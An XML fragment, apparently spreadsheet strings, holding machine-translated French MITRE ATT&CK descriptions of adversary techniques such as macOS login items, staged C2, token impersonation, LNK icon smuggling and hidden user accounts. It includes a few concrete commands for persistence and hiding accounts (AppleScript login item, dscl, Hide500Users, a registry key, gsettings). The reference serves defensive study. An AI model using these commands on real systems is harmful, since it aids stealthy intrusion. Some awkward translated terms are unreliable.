    <t>Les adversaires peuvent ajouter des éléments de connexion à exécuter lors de la connexion de l’utilisateur afin d’obtenir la persistance ou d’élever les privilèges. Les éléments de connexion sont des applications, des documents, des dossiers ou des connexions serveur qui sont lancés automatiquement lorsqu’un utilisateur se connecte. (Citation : Ouvrir les éléments de connexion Apple) Les éléments de connexion peuvent être ajoutés via une liste de fichiers partagés ou Service Management Framework. (citation : Ajout d’éléments de connexion) Les éléments de connexion à la liste de fichiers partagés peuvent être définis à l’aide de langages de script tels que [AppleScript](https://attack.mitre.org/techniques/T1059/002), tandis que Service Management Framework utilise l’appel d’API &lt;code&gt;SMLoginItemSetEnabled&lt;/code&gt;.
Les éléments de connexion installés à l’aide de l’outil de levier Service Management Framework &lt;code&gt;lancé&lt;/code&gt; ne sont pas visibles dans les Préférences Système et ne peuvent être supprimés que par l’application qui les a créés. (citation : Ajout d’éléments de connexion)(Citation : SMLoginItemSetEnabled Schroeder 2013) Les éléments de connexion créés à l’aide d’une liste de fichiers partagés sont visibles dans les Préférences Système, peuvent masquer l’application lors de son lancement et sont exécutés via LaunchServices, et non lancés, pour ouvrir des applications, des documents ou des URL sans utiliser le Finder. (Citation : Lancement des services Apple Developer) Les utilisateurs et les applications utilisent des éléments de connexion pour configurer leur environnement utilisateur afin de lancer des services ou des applications couramment utilisés, tels que des applications de messagerie, de chat et de musique.
Les adversaires peuvent utiliser les appels [AppleScript](https://attack.mitre.org/techniques/T1059/002) et [Native API](https://attack.mitre.org/techniques/T1106) pour créer un élément de connexion afin de générer des exécutables malveillants. (Citation : ELC en cours d’exécution au démarrage) Avant la version 10.5 sur macOS, les adversaires pouvaient ajouter des éléments de connexion à l’aide de [AppleScript](https://attack.mitre.org/techniques/T1059/002) pour envoyer des événements Apple au processus « Événements système », qui dispose d’un dictionnaire AppleScript pour manipuler les éléments de connexion. (Citation : Éléments de connexion AE) Les adversaires peuvent utiliser une commande telle que &lt;code&gt;tell application « System Events » pour créer un élément de connexion à la fin avec les propriétés /path/to/executable&lt;/code&gt;. (Citation : Startup Items Eclectic)(Citation : analyse hexed osx.dok 2019)(citation : Ajouter une liste Supprimer les éléments de connexion Apple Script) Cette commande ajoute le chemin d’accès de l’exécutable malveillant à la liste des fichiers d’éléments de connexion située dans &lt;code&gt;~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm&lt;/code&gt;. (Citation : Startup Items Eclectic) Les adversaires peuvent également utiliser des éléments de connexion pour lancer des exécutables qui peuvent être utilisés pour contrôler le système victime à distance ou comme moyen d’obtenir une élévation de privilèges en demandant les informations d’identification de l’utilisateur. (Citation : objsee mac malware 2017)(Citation : CheckPoint Dok)(Citation : objsee netwire backdoor 2019)
https://attack.mitre.org/techniques/T1547/015</t>
  </si>
  <si>
    <t>Les adversaires peuvent télécharger, installer ou configurer d’une autre manière des fonctionnalités qui peuvent être utilisées pendant le ciblage. Pour soutenir ses opérations, un adversaire peut avoir besoin de prendre les capacités qu’il a développées ([Développer des capacités](https://attack.mitre.org/techniques/T1587)) ou obtenues ([Obtenir des capacités](https://attack.mitre.org/techniques/T1588)) et de les mettre en place sur une infrastructure sous son contrôle. Ces capacités peuvent être déployées sur une infrastructure qui a déjà été achetée/louée par l’adversaire ([Acquérir l’infrastructure](https://attack.mitre.org/techniques/T1583)) ou qui a été compromise par celui-ci ([Compromettre l’infrastructure](https://attack.mitre.org/techniques/T1584)). Les fonctionnalités peuvent également être mises en scène sur des services Web, tels que GitHub ou Pastebin, ou sur des offres PaaS (Platform-as-a-Service) qui permettent aux utilisateurs de provisionner facilement des applications. (Citation : Volexity Ocean Lotus novembre 2020)(Citation : Trou d’eau de Dragos Heroku)(Citation : Malwarebytes Heroku Skimmers)(Citation : Redirection Netskope GCP)(Citation : Netskope Cloud Phishing)
La mise en scène des capacités peut aider l’adversaire dans un certain nombre de comportements d’accès initiaux et post-compromission, notamment (mais sans s’y limiter) :
* Mise en scène des ressources Web nécessaires pour effectuer le [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) lorsqu’un utilisateur navigue sur un site. (Citation : FireEye CFR Watering Hole 2012)(Référence : Gallagher 2015)(Citation : ATT ScanBox)
* Mise en scène des ressources web pour une cible de lien à utiliser avec le spearphishing. (Citation : Malwarebytes Silent Librarian octobre 2020)(Citation : Proofpoint TA407 septembre 2019)
* Téléchargement de logiciels malveillants ou d’outils vers un emplacement accessible au réseau d’une victime pour permettre le [Transfert d’outils d’entrée](https://attack.mitre.org/techniques/T1105). (Citation : Volexity Ocean Lotus novembre 2020)
* Installation d’un certificat SSL/TLS précédemment acquis à utiliser pour chiffrer le trafic de commande et de contrôle (ex : [Cryptographie asymétrique](https://attack.mitre.org/techniques/T1573/002) avec [Protocoles Web](https://attack.mitre.org/techniques/T1071/001)). (Citation : DigiCert Install SSL Cert)
https://attack.mitre.org/techniques/T1608</t>
  </si>
  <si>
    <t>Les adversaires peuvent mettre en place des ressources référencées par un lien qui peut être utilisé lors du ciblage. Un adversaire peut compter sur le fait qu’un utilisateur clique sur un lien malveillant afin de divulguer des informations (y compris des informations d’identification) ou d’obtenir une exécution, comme dans [Lien malveillant](https://attack.mitre.org/techniques/T1204/001). Les liens peuvent être utilisés pour le spearphishing, par exemple pour envoyer un e-mail accompagné d’un texte d’ingénierie sociale afin d’inciter l’utilisateur à cliquer activement ou à copier et coller une URL dans un navigateur. Avant d’effectuer un hameçonnage pour obtenir des informations (comme dans [Lien de spearphishing](https://attack.mitre.org/techniques/T1598/003)) ou un hameçonnage pour obtenir un premier accès à un système (comme dans [Lien de spearphishing](https://attack.mitre.org/techniques/T1566/002)), un adversaire doit configurer les ressources d’une cible de lien pour le lien de spearphishing. 
En règle générale, les ressources d’une cible de lien sont une page HTML qui peut inclure un script côté client tel que [JavaScript](https://attack.mitre.org/techniques/T1059/007) pour décider du contenu à proposer à l’utilisateur. Les adversaires peuvent cloner des sites légitimes pour servir de cible de lien, ce qui peut inclure le clonage de pages de connexion de services Web légitimes ou de pages de connexion d’organisation dans le but de collecter des informations d’identification pendant [Lien de spearphishing](https://attack.mitre.org/techniques/T1598/003). (Citation : Malwarebytes Silent Librarian octobre 2020)(Citation : Proofpoint TA407 septembre 2019) Les adversaires peuvent également [Télécharger un logiciel malveillant](https://attack.mitre.org/techniques/T1608/001) et faire pointer la cible du lien vers un logiciel malveillant pour téléchargement/exécution par l’utilisateur.
Les adversaires peuvent acheter des domaines similaires à des domaines légitimes (par exemple : homoglyphes, typosquattage, domaine de premier niveau différent, etc.) lors de l’acquisition d’infrastructures ([Domaines](https://attack.mitre.org/techniques/T1583/001)) pour faciliter [Lien malveillant](https://attack.mitre.org/techniques/T1204/001).
Des liens peuvent être écrits par des adversaires pour masquer la véritable destination afin de tromper les victimes en abusant du schéma d’URL et en augmentant l’efficacité du phishing. (Citation : Masquage Kaspersky)(Citation : mandiant-masking)
Les adversaires peuvent également utiliser des comptes gratuits ou payants sur des services de raccourcissement de liens et des fournisseurs de plates-formes en tant que service pour héberger des cibles de liens tout en profitant des domaines largement fiables de ces fournisseurs pour éviter d’être bloqués tout en redirigeant les victimes vers des pages malveillantes. (Citation : Redirection Netskope GCP)(Citation : Netskope Cloud Phishing)(Citation : Intezer App Service Phishing)(Citation : Cofense-redirect) En outre, les adversaires peuvent diffuser une variété de liens malveillants par le biais d’URI/URL générées de manière unique (y compris des liens à usage unique et uniques). (Citation : Schéma d’URL iOS)(Citation : URI)(citation : utilisation de l’URI)(citation : URI unique) Enfin, les adversaires peuvent tirer parti de la nature décentralisée de l’InterPlanetary File System (IPFS) pour héberger des cibles de liens difficiles à supprimer. (Référence : Talos IPFS 2022)
https://attack.mitre.org/techniques/T1608/005</t>
  </si>
  <si>
    <t>Les adversaires peuvent créer plusieurs étapes de commandement et de contrôle qui sont employées dans des conditions différentes ou pour certaines fonctions. L’utilisation de plusieurs étages peut obscurcir le canal de commande et de contrôle et rendre la détection plus difficile.
Les outils d’accès à distance rappelleront le serveur de commande et de contrôle de premier niveau pour obtenir des instructions. La première étape peut avoir des capacités automatisées pour collecter des informations de base sur l’hôte, mettre à jour les outils et télécharger des fichiers supplémentaires. Un deuxième outil d’accès à distance (RAT) peut être téléchargé à ce stade pour rediriger l’hôte vers le serveur de commande et de contrôle de deuxième étape. La deuxième étape sera probablement plus complète et permettra à l’adversaire d’interagir avec le système par le biais d’une coquille inversée et de fonctionnalités RAT supplémentaires.
Les différentes étapes seront probablement hébergées séparément, sans chevauchement d’infrastructure. Le chargeur peut également disposer de rappels de première étape de secours ou de [Canaux de secours](https://attack.mitre.org/techniques/T1008) au cas où le chemin de communication initial de la première étape serait découvert et bloqué.
https://attack.mitre.org/techniques/T1104</t>
  </si>
  <si>
    <t>Les adversaires peuvent voler des ressources monétaires à des cibles par le biais de l’extorsion, de l’ingénierie sociale, du vol technique ou d’autres méthodes visant à leur propre gain financier au détriment de la disponibilité de ces ressources pour les victimes. Le vol financier est l’objectif ultime de plusieurs types de campagnes populaires, notamment l’extorsion par ransomware, la compromission des e-mails professionnels (BEC) et la fraude, le piratage de banques, le piratage bancaire et l’exploitation des réseaux de cryptomonnaies. (Citation : BBC-Ronin) 
Les adversaires peuvent [Compromettre des comptes](https://attack.mitre.org/techniques/T1586) pour effectuer des transferts de fonds non autorisés. (Citation : Rapport sur la criminalité sur Internet 2022) Dans le cas d’une compromission d’e-mail professionnel ou d’une fraude par e-mail, un adversaire peut utiliser [Usurpation d’identité](https://attack.mitre.org/techniques/T1656) d’une entité de confiance. Une fois que l’ingénierie sociale a réussi, les victimes peuvent être trompées et envoyer de l’argent sur des comptes financiers contrôlés par un adversaire. (Référence : FBI-BEC) Cela crée un risque de victimes multiples (c’est-à-dire des comptes compromis ainsi que la perte monétaire ultime) dans les incidents impliquant un vol financier. (Référence : VEC)
L’extorsion par ransomware peut se produire, par exemple, lorsqu’un adversaire exige un paiement d’une victime après [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) (Citation : NYT-Colonial) et [Exfiltration](https://attack.mitre.org/tactics/TA0010) de données, suivi d’une menace de fuite de données sensibles au public si le paiement n’est pas effectué à l’adversaire. (Citation : Mandiant-leaks) Les adversaires peuvent utiliser des sites de fuite dédiés pour distribuer les données des victimes. (Citation : Crowdstrike-leaks)
En raison de l’impact commercial potentiellement immense du vol financier, un adversaire peut abuser de la possibilité d’un vol financier et rechercher un gain financier pour détourner l’attention de ses véritables objectifs tels que la destruction de données(https://attack.mitre.org/techniques/T1485) et l’interruption de l’activité. (Citation : AP-NotPetya)
https://attack.mitre.org/techniques/T1657</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser des garde-fous d’exécution pour limiter l’exécution ou les actions en fonction des conditions spécifiques fournies par l’adversaire et de l’environnement qui devraient être présentes sur la cible. Les garde-fous garantissent qu’une charge utile ne s’exécute que contre une cible prévue et réduisent les dommages collatéraux de la campagne d’un adversaire. (Citation : FireEye Kevin Mandia Guardrails) Les valeurs qu’un adversaire peut fournir à propos d’un système ou d’un environnement cible à utiliser comme garde-fous peuvent inclure des noms de partage de réseau spécifiques, des périphériques physiques attachés, des fichiers, des domaines Active Directory (AD) joints et des adresses IP locales/externes. (Citation : FireEye Outlook décembre 2019)
Les garde-corps peuvent être utilisés pour empêcher l’exposition des capacités dans des environnements qui ne sont pas destinés à être compromis ou à être exploités dans dedans. Cette utilisation des garde-fous est distincte de la [Virtualisation/Évasion du bac à sable](https://attack.mitre.org/techniques/T1497). Alors que l’utilisation de [Virtualisation/Évasion de bac à sable](https://attack.mitre.org/techniques/T1497) peut impliquer la vérification des valeurs connues du bac à sable et la poursuite de l’exécution uniquement s’il n’y a pas de correspondance, l’utilisation de garde-fous implique la vérification d’une valeur attendue spécifique à la cible et la poursuite de l’exécution uniquement s’il existe une telle correspondance.
Les adversaires peuvent identifier et bloquer certains user-agents pour échapper aux défenses et restreindre la portée de leur attaque aux victimes et aux plateformes sur lesquelles elle sera la plus efficace. Un agent utilisateur identifie lui-même des données telles que l’application logicielle, le système d’exploitation, le fournisseur et la version de l’utilisateur. Les adversaires peuvent vérifier l’identification du système d’exploitation par les agents utilisateurs, puis ne diffuser que des logiciels malveillants pour les logiciels exploitables tout en ignorant tous les autres systèmes d’exploitation. (Citation : Trellix-Qakbot)
https://attack.mitre.org/techniques/T1480</t>
  </si>
  <si>
    <t>Les adversaires peuvent énumérer des objets dans l’infrastructure de stockage cloud. Les adversaires peuvent utiliser ces informations lors de la découverte automatisée pour façonner des comportements ultérieurs, notamment en demandant tous les objets ou des objets spécifiques à partir du stockage dans le cloud.  À l’instar de [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) sur un hôte local, après avoir identifié les services de stockage disponibles (c’est-à-dire [Cloud Infrastructure Discovery](https://attack.mitre.org/techniques/T1580))), les adversaires peuvent accéder au contenu/aux objets stockés dans l’infrastructure cloud.
Les fournisseurs de services cloud proposent des API permettant aux utilisateurs d’énumérer les objets stockés dans le stockage cloud. Par exemple, ListObjectsV2 dans AWS (Citation : ListObjectsV2) et List Blobs dans Azure (Citation : List Blobs) .
https://attack.mitre.org/techniques/T1619</t>
  </si>
  <si>
    <t>Les adversaires peuvent falsifier des cookies Web qui peuvent être utilisés pour accéder à des applications Web ou à des services Internet. Les applications et services Web (hébergés dans des environnements cloud SaaS ou des serveurs sur site) utilisent souvent des cookies de session pour authentifier et autoriser l’accès des utilisateurs.
Les adversaires peuvent générer ces cookies afin d’accéder aux ressources Web. Cela diffère de [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539) et d’autres comportements similaires en ce sens que les cookies sont nouveaux et forgés par l’adversaire, plutôt que volés ou interceptés auprès d’utilisateurs légitimes. La plupart des applications Web courantes ont des valeurs de cookies standardisées et documentées qui peuvent être générées à l’aide des outils ou des interfaces fournis. (Citation : Passez le cookie) La génération de cookies Web nécessite souvent des valeurs secrètes, telles que des mots de passe, des [clés privées](https://attack.mitre.org/techniques/T1552/004) ou d’autres valeurs de graine cryptographiques.
Une fois falsifiés, les adversaires peuvent utiliser ces cookies Web pour accéder à des ressources ([Web Session Cookie](https://attack.mitre.org/techniques/T1550/004)), qui peuvent contourner les mécanismes de protection multifactoriels et autres mécanismes de protection d’authentification. (Citation : Volexity SolarWinds)(Citation : Passez le cookie)(Citation : Unit 42 Mac Crypto Cookies Janvier 2019)
https://attack.mitre.org/techniques/T1606/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent énumérer les journaux du système et des services pour trouver des données utiles. Ces journaux peuvent mettre en évidence divers types d’informations précieuses pour un adversaire, telles que les enregistrements d’authentification des utilisateurs ([Account Discovery](https://attack.mitre.org/techniques/T1087)), les logiciels de sécurité ou vulnérables ([Software Discovery](https://attack.mitre.org/techniques/T1518)), ou les hôtes au sein d’un réseau compromis ([Remote System Discovery](https://attack.mitre.org/techniques/T1018)).
Les fichiers binaires de l’hôte peuvent être exploités pour collecter les journaux système. Par exemple, l’utilisation de « wevtutil.exe » ou de [PowerShell](https://attack.mitre.org/techniques/T1059/001) sous Windows pour accéder et/ou exporter des informations sur les événements de sécurité. (Citation : Rapport d’information sur la menace WithSecure Lazarus-NoPineapple 2023)(Citation : Le cadet Blizzard émerge comme un nouvel acteur de menace) Dans les environnements cloud, les adversaires peuvent tirer parti d’utilitaires tels que le « CollectGuestLogs.exe » de l’agent de machine virtuelle Azure pour collecter les journaux de sécurité à partir d’une infrastructure hébergée dans le cloud. (Citation : Échange de carte SIM et abus de la console série Microsoft Azure)
Les adversaires peuvent également cibler une infrastructure de journalisation centralisée telle que les SIEM. Les journaux peuvent également être exportés en bloc et envoyés à une infrastructure contrôlée par l’adversaire pour une analyse hors ligne.
En plus d’acquérir une meilleure compréhension de l’environnement, les adversaires peuvent également surveiller les journaux en temps réel pour suivre les procédures de réponse aux incidents. Cela peut leur permettre d’ajuster leurs techniques afin de maintenir leur persistance ou d’échapper aux défenses. (Référence : Permiso GUI-Vil 2023)
https://attack.mitre.org/techniques/T1654</t>
  </si>
  <si>
    <t>Les adversaires peuvent dupliquer puis usurper l’identité du jeton existant d’un autre utilisateur pour élever les privilèges et contourner les contrôles d’accès. Par exemple, un adversaire peut dupliquer un jeton existant à l’aide de « DuplicateToken » ou de « DuplicateTokenEx ». (Citation : Fonction DuplicateToken) Le jeton peut ensuite être utilisé avec « ImpersonateLoggedOnUser » pour permettre au thread appelant d’emprunter l’identité d’un utilisateur connecté dans le contexte de sécurité d’un utilisateur connecté, ou avec « SetThreadToken » pour attribuer le jeton emprunté à un thread.
Un adversaire peut effectuer [Usurpation d’identité/Vol de jeton](https://attack.mitre.org/techniques/T1134/001) lorsqu’il dispose d’un processus spécifique existant auquel il souhaite attribuer le jeton dupliqué. Par exemple, cela peut être utile lorsque l’utilisateur cible dispose d’une session d’ouverture de session non réseau sur le système.
Lorsqu’un adversaire utilise plutôt un jeton dupliqué pour créer un nouveau processus plutôt que de l’attacher à un processus existant, il peut également [Créer un processus avec un jeton](https://attack.mitre.org/techniques/T1134/002) à l’aide de 'CreateProcessWithTokenW' ou 'CreateProcessAsUserW'. [Usurpation d’identité/vol de jetons](https://attack.mitre.org/techniques/T1134/001) se distingue également de [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003) en ce sens qu’il fait référence à la duplication d’un token existant, plutôt qu’à la création d’un nouveau.
https://attack.mitre.org/techniques/T1134/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent exfiltrer des données vers un référentiel de code plutôt que sur leur canal de commande et de contrôle principal. Les dépôts de code sont souvent accessibles via une API (ex : https://api.github.com). L’accès à ces API se fait souvent via HTTPS, ce qui donne à l’adversaire un niveau de protection supplémentaire.
L’exfiltration vers un référentiel de code peut également fournir une couverture importante à l’adversaire s’il s’agit d’un service populaire déjà utilisé par les hôtes du réseau.
https://attack.mitre.org/techniques/T1567/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent se connecter à des services cloud accessibles dans un environnement compromis à l’aide de [comptes valides](https://attack.mitre.org/techniques/T1078) synchronisés ou fédérés avec les identités des utilisateurs locaux. L’adversaire peut alors effectuer des actions de gestion ou accéder aux ressources hébergées dans le cloud en tant qu’utilisateur connecté. 
De nombreuses entreprises fédèrent les identités des utilisateurs gérées de manière centralisée vers les services cloud, ce qui permet aux utilisateurs de se connecter avec leurs informations d’identification de domaine afin d’accéder au plan de contrôle du cloud. De même, les adversaires peuvent se connecter aux services cloud disponibles via la console web ou via l’interface de ligne de commande (CLI) cloud (par exemple, [Cloud API](https://attack.mitre.org/techniques/T1059/009)), à l’aide de commandes telles que &lt;code&gt;Connect-AZAccount&lt;/code&gt; pour Azure PowerShell, &lt;code&gt;Connect-MgGraph&lt;/code&gt; pour Microsoft Graph PowerShell et &lt;code&gt;gcloud auth login&lt;/code&gt; pour l’interface de ligne de commande Google Cloud.
Dans certains cas, les adversaires peuvent être en mesure de s’authentifier auprès de ces services via [Jeton d’accès à l’application](https://attack.mitre.org/techniques/T1550/001) au lieu d’un nom d’utilisateur et d’un mot de passe.
https://attack.mitre.org/techniques/T1021/007</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser le cognement de port pour masquer les ports ouverts utilisés pour la persistance ou la commande et le contrôle. Pour activer un port, un adversaire envoie une série de tentatives de connexion à une séquence prédéfinie de ports fermés. Une fois la séquence terminée, l’ouverture d’un port est souvent effectuée par le pare-feu basé sur l’hôte, mais peut également être mise en œuvre par un logiciel personnalisé.
Cette technique a été observée à la fois pour l’ouverture dynamique d’un port d’écoute et pour l’initiation d’une connexion à un serveur d’écoute sur un système différent.
L’observation des paquets de signaux pour déclencher la communication peut être effectuée par différentes méthodes. Un moyen, mis en œuvre à l’origine par Cd00r (Citation : Hartrell cd00r 2002), est d’utiliser les bibliothèques libpcap pour renifler les paquets en question. Une autre méthode exploite les sockets bruts, ce qui permet au logiciel malveillant d’utiliser des ports déjà ouverts pour être utilisés par d’autres programmes.
https://attack.mitre.org/techniques/T1205/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent faire passer en contrebande des commandes pour télécharger des charges utiles malveillantes au-delà des filtres de contenu en les cachant dans des fichiers de raccourcis Windows apparemment inoffensifs. Fichiers de raccourci Windows (. LNK) incluent de nombreux champs de métadonnées, y compris un champ d’emplacement d’icône (également connu sous le nom de « IconEnvironmentDataBlock ») conçu pour spécifier le chemin d’accès à un fichier d’icône qui doit être affiché pour le fichier LNK dans un répertoire hôte. 
Les adversaires peuvent abuser de ces métadonnées LNK pour télécharger des charges utiles malveillantes. Par exemple, des adversaires ont été observés en train d’utiliser des fichiers LNK comme charges utiles de phishing pour diffuser des logiciels malveillants. Une fois appelées (par exemple, [Fichier malveillant](https://attack.mitre.org/techniques/T1204/002)), les charges utiles référencées via des URL externes dans le champ d’emplacement de l’icône LNK peuvent être téléchargées. Ces fichiers peuvent également être invoqués par les arguments [Interpréteur de commandes et de scripts](https://attack.mitre.org/techniques/T1059)/[Exécution de proxy binaire système](https://attack.mitre.org/techniques/T1218) dans le champ de chemin cible de la LNK. (Citation : Raccourci de déprotection)(Citation : Booby Trap Shortcut 2017)
La contrebande d’icônes LNK peut également être utilisée après la compromission, par exemple par des scripts malveillants exécutant un LNK sur un hôte infecté pour télécharger des charges utiles malveillantes supplémentaires.
https://attack.mitre.org/techniques/T1027/012</t>
  </si>
  <si>
    <t>Les adversaires peuvent s’inscrire à des services Web qui peuvent être utilisés lors du ciblage. Il existe une variété de sites Web populaires permettant aux adversaires de s’inscrire à un service Web qui peut être utilisé de manière abusive au cours des étapes ultérieures du cycle de vie de l’adversaire, par exemple pendant le commandement et le contrôle ([Service Web](https://attack.mitre.org/techniques/T1102)), [Exfiltration sur le service Web](https://attack.mitre.org/techniques/T1567) ou [Phishing](https://attack.mitre.org/techniques/T1566). L’utilisation de services courants, tels que ceux proposés par Google ou Twitter, permet aux adversaires de se cacher plus facilement dans le bruit attendu. (Référence : FireEye APT29) En utilisant un service Web, les adversaires peuvent rendre difficile le lien physique entre les opérations et eux.
https://attack.mitre.org/techniques/T1583/006</t>
  </si>
  <si>
    <t>Les adversaires peuvent envoyer des messages de spearphishing avec une pièce jointe malveillante pour obtenir des informations sensibles qui peuvent être utilisées lors du ciblage. Le spearphishing pour obtenir des informations est une tentative d’inciter les cibles à divulguer des informations, souvent des informations d’identification ou d’autres informations exploitables. Le spearphishing pour obtenir des informations fait souvent appel à des techniques d’ingénierie sociale, telles que se faire passer pour une source ayant une raison de collecter des informations (ex : [Établir des comptes](https://attack.mitre.org/techniques/T1585) ou [Compromettre des comptes](https://attack.mitre.org/techniques/T1586)) et/ou envoyer plusieurs messages apparemment urgents.
Toutes les formes de spearphishing sont des actions d’ingénierie sociale transmises par voie électronique et ciblent une personne, une entreprise ou un secteur d’activité spécifique. Dans ce scénario, les adversaires joignent un fichier à l’e-mail de spearphishing et s’appuient généralement sur le destinataire pour remplir les informations, puis renvoyer le fichier. (citation : Pièce jointe Sophos)(Citation : Wikipédiatrie de GitHub) Le texte de l’e-mail de spearphishing tente généralement de donner une raison plausible pour laquelle le fichier devrait être rempli, comme une demande d’informations de la part d’un partenaire commercial. Les adversaires peuvent également utiliser des informations provenant d’efforts de reconnaissance antérieurs (par exemple : [Rechercher des sites Web/domaines ouverts](https://attack.mitre.org/techniques/T1593) ou [Rechercher des sites Web appartenant à des victimes](https://attack.mitre.org/techniques/T1594)) pour créer des leurres persuasifs et crédibles.
https://attack.mitre.org/techniques/T1598/002</t>
  </si>
  <si>
    <t>Un adversaire peut s’appuyer sur des actions spécifiques de la part d’un utilisateur afin d’obtenir l’exécution. Les utilisateurs peuvent être soumis à l’ingénierie sociale pour les amener à exécuter du code malveillant, par exemple en ouvrant un fichier de document ou un lien malveillant. Ces actions de l’utilisateur sont généralement observées comme des comportements de suivi de formes de [Phishing](https://attack.mitre.org/techniques/T1566).
Bien que [User Execution](https://attack.mitre.org/techniques/T1204) se produise fréquemment peu de temps après l’accès initial, il peut se produire à d’autres phases d’une intrusion, par exemple lorsqu’un adversaire place un fichier dans un répertoire partagé ou sur le bureau d’un utilisateur en espérant qu’un utilisateur cliquera dessus. Cette activité peut également être observée peu de temps après [Spearphishing interne](https://attack.mitre.org/techniques/T1534).
Les adversaires peuvent également inciter les utilisateurs à effectuer des actions telles que :
* Activation du [Logiciel d’accès à distance](https://attack.mitre.org/techniques/T1219), permettant un contrôle direct du système à l’adversaire
* Exécuter du JavaScript malveillant dans leur navigateur, permettant aux adversaires de [Voler le cookie de session Web](https://attack.mitre.org/techniques/T1539)s(Citation : Talos Roblox Scam 2023)(Citation : Krebs Discord Bookmarks 2023)
* Téléchargement et exécution de logiciels malveillants pour [User Execution](https://attack.mitre.org/techniques/T1204)
* Forcer les utilisateurs à copier, coller et exécuter manuellement du code malveillant (Citation : Reliaquest-execution)
Par exemple, les escroqueries au support technique peuvent être facilitées par le biais du [phishing](https://attack.mitre.org/techniques/T1566), de l’hameçonnage vocal ou de diverses formes d’interaction avec l’utilisateur. Les adversaires peuvent utiliser une combinaison de ces méthodes, telles que l’usurpation d’identité et la promotion de numéros gratuits ou de centres d’appels utilisés pour diriger les victimes vers des sites Web malveillants, pour livrer et exécuter des charges utiles contenant des logiciels malveillants ou un [logiciel d’accès à distance](https://attack.mitre.org/techniques/T1219). (Citation : Attaque téléphonique)
https://attack.mitre.org/techniques/T1204</t>
  </si>
  <si>
    <t>Un adversaire peut dégrader les systèmes internes d’une organisation dans le but d’intimider ou d’induire en erreur les utilisateurs, discréditant ainsi l’intégrité des systèmes. Cela peut prendre la forme de modifications apportées à des sites Web internes ou directement aux systèmes de l’utilisateur avec le remplacement du fond d’écran. (Citation : Novetta Blockbuster) Des images dérangeantes ou offensantes peuvent être utilisées dans le cadre de [Dégradation interne](https://attack.mitre.org/techniques/T1491/001) afin de causer de l’inconfort à l’utilisateur ou de faire pression sur le respect des messages d’accompagnement. Étant donné que la dégradation interne des systèmes expose la présence d’un adversaire, elle a souvent lieu après que d’autres objectifs d’intrusion ont été atteints. (Citation : Logiciel malveillant destructeur Novetta Blockbuster)
https://attack.mitre.org/techniques/T1491/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser des utilisateurs masqués pour masquer la présence des comptes d’utilisateurs qu’ils créent ou modifient. Les administrateurs peuvent vouloir masquer des utilisateurs lorsqu’il existe de nombreux comptes d’utilisateurs sur un système donné ou s’ils souhaitent masquer leurs comptes d’administration ou autres comptes de gestion à d’autres utilisateurs. 
Sous macOS, les adversaires peuvent créer ou modifier un utilisateur à masquer en manipulant les fichiers plist, les attributs de dossier et les attributs utilisateur. Pour éviter qu’un utilisateur ne s’affiche sur l’écran de connexion et dans les Préférences Système, les adversaires peuvent définir l’ID utilisateur sur une valeur inférieure à 500 et définir la valeur de clé &lt;code&gt;Hide500Users&lt;/code&gt; sur &lt;code&gt;TRUE&lt;/code&gt; dans le fichier &lt;code&gt;plist /Library/Preferences/com.apple.loginwindow&lt;/code&gt;. (Citation : Cybereason OSX Pirrit) Chaque utilisateur est associé à un ID utilisateur. Lorsque la valeur de la clé &lt;code&gt;Hide500Users&lt;/code&gt; est définie sur &lt;code&gt;TRUE,&lt;/code&gt; les utilisateurs dont l’ID utilisateur est inférieur à 500 n’apparaissent pas sur l’écran de connexion et dans les Préférences Système. À l’aide de la ligne de commande, les adversaires peuvent utiliser l’utilitaire &lt;code&gt;dscl&lt;/code&gt; pour créer des comptes d’utilisateurs masqués en définissant l’attribut &lt;code&gt;IsHidden&lt;/code&gt; sur &lt;code&gt;1&lt;/code&gt;. Les adversaires peuvent également masquer le dossier d’accueil d’un utilisateur en remplaçant les &lt;code&gt;chflags&lt;/code&gt; par hidden. (Citation : Assistance Apple Masquer un compte utilisateur) 
De la même manière, les adversaires peuvent masquer des comptes d’utilisateurs dans Windows. Les adversaires peuvent définir la valeur de la clé de registre &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList&lt;/code&gt; sur &lt;code&gt;0&lt;/code&gt; pour un utilisateur spécifique afin d’empêcher cet utilisateur d’être répertorié sur l’écran d’ouverture de session. (Citation : FireEye SMOKEDHAM, juin 2021)(Référence : US-CERT TA18-074A)
Sur les systèmes Linux, les adversaires peuvent masquer les comptes d’utilisateurs à partir de l’écran de connexion, également appelé accueil. La méthode qu’un adversaire peut utiliser dépend du gestionnaire d’affichage que la distribution utilise actuellement. Par exemple, sur un système Ubuntu utilisant le gestionnaire d’affichage GNOME (GDM), les comptes peuvent être cachés à l’accueil à l’aide de la commande &lt;code&gt;gsettings&lt;/code&gt; (ex : &lt;code&gt;sudo -u gdm gsettings set org.gnome.login-screen disable-user-list true&lt;/code&gt;). (citation : Masquer les comptes d’utilisateurs GDM) Les gestionnaires d’affichage ne sont pas ancrés à des distributions spécifiques et peuvent être modifiés par un utilisateur ou un adversaire.
https://attack.mitre.org/techniques/T1564/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent créer de nouveaux jetons et usurper l’identité des utilisateurs pour augmenter les privilèges et contourner les contrôles d’accès. Par exemple, si un adversaire dispose d’un nom d’utilisateur et d’un mot de passe, mais que l’utilisateur n’est pas connecté au système, il peut alors créer une session d’ouverture de session pour l’utilisateur à l’aide de la fonction « LogonUser ». (Citation : Fonction LogonUserW) La fonction renverra une copie du jeton d’accès de la nouvelle session et l’adversaire peut utiliser « SetThreadToken » pour attribuer le jeton à un thread.
Ce comportement est distinct de [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) en ce sens qu’il fait référence à la création d’un nouveau token utilisateur au lieu de voler ou de dupliquer un token existant.
https://attack.mitre.org/techniques/T1134/003</t>
  </si>
  <si>
